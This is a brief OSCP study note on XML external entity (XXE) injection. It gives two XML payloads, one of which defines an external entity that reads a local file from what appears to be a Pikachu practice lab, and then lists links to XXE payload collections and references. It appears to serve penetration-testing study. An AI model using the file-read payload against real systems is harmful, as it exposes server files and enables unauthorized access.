xxe - My-oscp-all-things - Obsidian Publish

### xxe ```xml <?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "test"> ]> <name>&hacker;</name> ``` ```xml <?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://phpStudy/WWW/pikachu/vul/rce/shell.php"> ]> <x>&f;</x> ``` ### tools [XXEpayload/xxe at master · hackping/XXEpayload · GitHub](https://github.com/hackping/XXEpayload/tree/master/xxe) ### Reference https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md https://github.com/payloadbox/xxe-injection-payload-list https://gist.githubusercontent.com/Ge0rg3/f3ef5272256f482b48fa69c5ccbac8ee/raw/04ef74149f87bf7d22f6de9edbfbbc0e9b549597/XXEnumerate_2.py ——》 readquick https://pentestbook.six2dez.com/enumeration/web/xxe